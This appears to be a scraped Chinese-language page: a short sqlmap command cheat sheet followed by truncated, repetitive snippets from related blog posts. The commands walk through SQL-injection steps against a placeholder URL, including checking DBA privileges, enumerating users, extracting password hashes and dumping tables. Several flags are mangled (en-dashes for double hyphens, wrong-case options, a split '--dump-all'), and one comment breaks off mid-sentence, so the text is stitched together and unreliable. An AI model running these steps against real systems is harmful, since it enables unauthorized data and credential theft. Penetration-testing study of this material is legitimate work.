推薦參考部落格:
sqlmap.py -u url 判斷
sqlmap.py -u url –is-dba 判斷是不是root許可權
sqlmap.py -u url –is-dba -v 這是判斷當前資料庫的使用者是否是dba
sqlmap.py -u url –users -v 0 這句的目的是列舉資料庫的使用者
sqlmap.py -u url –passwords -v 0 這句的目的是獲取資料庫使用者的密碼
sqlmap.py -u url –privileges -v 0 這是判斷當前的許可權
sqlmap.py -u url –dbs -v 0 這句的目的是將所有的資料庫列出來
sqlmap.py -u url –tables -d 『表』 爆表
sqlmap.py -u url –columns -t 『表』-d 『資料庫』爆列
sqlmap.py -u url –dump -t 『表』 –start 1 –stop 4 -v 0 這裡是查詢第2到第4行的內
sqlmap.py -u url –dump -all -v 0
sqlmap基本語法
推薦參考部落格 sqlmap.py u url 判斷 sqlmap.py u url is dba 判斷是不是root許可權 sqlmap.py u url is dba v 這是判斷當前資料庫的使用者是否是dba sqlmap.py u url users v 0 這句的目的是列舉資料庫的使用者 ...
sqlmap 基本使用
原文 遇到sql注入就sqlmap一把梭,有一說一,這個工具確實好用,不過還是要了解sql注入原理,不然只能做個指令碼小子,簡單了解一下 介紹之前,先簡單了解一下sqlmap的引數,可以利用 sqlmap h 查詢,這裡簡單介紹幾個常用的 u url r 檔案 dbs 獲取庫名 d 庫名 table...
SQLMAP基本使用
sqlmap u sqlmap u dbs sqlmap u current db sqlmap u d vhost48330 tables vhost48330 為指定資料庫名稱 sqlmap u d vhost48330 t admin columns admin 為指定表名稱 sqlmap u...